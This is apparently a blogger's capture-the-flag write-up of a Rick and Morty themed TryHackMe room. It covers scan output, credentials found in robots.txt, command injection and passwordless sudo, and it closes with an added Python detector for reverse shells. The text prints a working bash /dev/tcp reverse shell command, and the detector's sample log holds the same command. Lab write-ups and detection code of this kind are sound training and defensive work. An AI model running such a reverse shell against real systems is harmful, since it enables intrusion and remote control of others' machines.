
Created on Sat. 02 May 2020

Today I completed another room on TryHackMe, this one with a Rick and Morty theme!

I am still a noob and I did make a few errors while trying to break into this machine.


As usual I scanned the IP provided by TryHackMe to see what services were running on the machine.

            Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-02 14:24 CEST
            Pre-scan script results:
            | broadcast-avahi-dos:
            |   Discovered hosts:
            |   After NULL UDP avahi packet DoS (CVE-2011-1002).
            |_  Hosts are all up (not vulnerable).
            Nmap scan report for
            Host is up (0.020s latency).
            Not shown: 998 closed ports
            22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
            80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
            | http-cookie-flags:
            |   /login.php:
            |     PHPSESSID:
            |_      httponly flag not set
            |_http-csrf: Couldn't find any CSRF vulnerabilities.
            |_http-dombased-xss: Couldn't find any DOM based XSS.
            | http-enum:
            |   /login.php: Possible admin folder
            |_  /robots.txt: Robots file
            | http-fileupload-exploiter:
            |     Couldn't find a file-type field.
            |_    Couldn't find a file-type field.
            |_http-server-header: Apache/2.4.18 (Ubuntu)
            | http-sql-injection:
            |   Possible sqli for queries:
            |_http-stored-xss: Couldnt find any stored XSS vulnerabilities.
            Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

            Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
            Nmap done: 1 IP address (1 host up) scanned in 359.68 seconds

            #[p4p1@computer thm/]$ nikto -host
            - Nikto v2.1.5
            + Target IP:
            + Target Hostname:
            + Target Port:        80
            + Start Time:         2020-05-02 18:33:22 (GMT2)
            + Server: Apache/2.4.18 (Ubuntu)
            + Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686
            + The anti-clickjacking X-Frame-Options header is not present.
            + No CGI Directories found (use '-C all' to force check all possible dirs)
            + "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
            + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
            + Cookie PHPSESSID created without the httponly flag
            + OSVDB-3233: /icons/README: Apache default file found.
            + /login.php: Admin login page/section found.
            + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
            + End Time:           2020-05-02 18:44:53 (GMT2) (376 seconds)

While the nikto and nmap scans were running I also decided to run a few scans with OWASP ZAP proxy, just in case.

With all of the scans finished and all of this information I went on the main page to explore a little. I then opened the source code and found a username.

With that out of the way, there is obviously a login page somewhere. Looking back at the scans it was pretty obvious the login page was at /login.php. But the scans also returned some information about robots.txt, so I decided I should visit that too. Opening the robots.txt file I saw a string that resembled a password, so I decided to go to the login page and try it.

Command Injection

From here, after logging in with Rick's account, there was a command panel. Seeing this I wanted to inject some kind of reverse shell so that I could mess around a lot more! So I began by seeing who I was and what was inside of the directory.

I was in /var/www/html and my user was www-data. With sudo -l I saw that I had basically root access from the get go, so no need for any privilege escalation today. In the current working directory of the user www-data the first flag is located in a .txt file. There was also a clue.txt; I opened it in my browser and it told me that the second flag is in the /home/ folder. When running the cat command inside of the shell there was an error and I could not run the cat command. So I figured I needed a proper shell, either a reverse one or with a phpbash script. I uploaded phpbash but the script wasn't working for some reason.

After a lot of trial and error with Python reverse shells, not understanding why they didn't work, I looked at another write-up and found that you could use a bash reverse shell. After running it encapsulated in a bash -c '' I had a reverse shell:

            bash -c 'bash -i >& /dev/tcp/x.x.x.x/8080 0>&1'

With the reverse shell working I then displayed the flag in the home folder, and with the prior knowledge that the user could run sudo commands without a password I displayed the flag located in the root directory.
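The two things that got me through this box (a bash reverse shell hidden inside bash -c '...', and www-data being allowed to sudo without a password) are also the two things a defender would want to catch in process-execution logs. This is an added example, not part of the original write-up: a small Python detector over constructed audit records (user plus full command line; the 10.0.0.5 address and the record format are made up for the example) that unwraps the bash -c argument before matching, since looking only at argv[0] would miss the payload.

```python
import re

# Constructed sample of process-execution records ("user  command line"),
# modelled on what the walkthrough describes: www-data running the bash -c
# reverse shell from the command panel, then sudo without a password.
# These lines and the 10.0.0.5 address are made up for this example.
SAMPLE_EXEC_LOG = [
    "www-data  /bin/sh -c whoami",
    "www-data  /bin/sh -c ls -la",
    "www-data  bash -c 'bash -i >& /dev/tcp/10.0.0.5/8080 0>&1'",
    "www-data  sudo cat /root/root.txt",
    "alice     bash -c 'ls /tmp'",
]

# Indicators of an interactive shell being wired to a network socket.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),  # bash network redirection
    re.compile(r"\bbash\s+-i\b.*[>&]"),                        # interactive shell with fd redirection
    re.compile(r"0>&1|0<&1"),                                   # stdin attached to the socket
]

# Service accounts that should never spawn an interactive shell or use sudo.
WEB_SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}


def unwrap_shell_c(cmd):
    """Return the quoted command given to `bash -c`/`sh -c` (or cmd itself if none).

    The walkthrough's payload only ran once wrapped in bash -c '...', which is
    why the inner string, not just argv[0], has to be inspected.
    """
    m = re.search(r"(?:bash|sh)\s+-c\s+(['\"])(.*)\1\s*$", cmd)
    return m.group(2) if m else cmd


def classify(line):
    """Classify one 'user  command' record; returns the list of finding tags."""
    user, _, cmd = line.partition("  ")
    user, cmd = user.strip(), cmd.strip()
    inner = unwrap_shell_c(cmd)
    findings = []
    if any(p.search(inner) for p in REVERSE_SHELL_PATTERNS):
        findings.append("reverse_shell")
    if user in WEB_SERVICE_ACCOUNTS and re.match(r"sudo\b", cmd):
        findings.append("web_account_sudo")
    if user in WEB_SERVICE_ACCOUNTS and re.search(r"\b(bash|sh)\s+-i\b", inner):
        findings.append("web_account_interactive_shell")
    return findings


def scan(lines):
    """Return {record: findings} for every record that triggered at least one tag."""
    results = {}
    for record in lines:
        tags = classify(record)
        if tags:
            results[record] = tags
    return results
```

The plain `whoami` and `ls -la` probes from the command panel are not flagged here; they would need a web-application-level control (an allowlist on the panel, or no shell-out at all) rather than host telemetry.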

In conclusion, this room was easy but I felt very rusty. I took a 3 day break and it really didn't help; I need to get back in the flow of solving those rooms.

Thank you for reading please check out my other write ups and share this page.
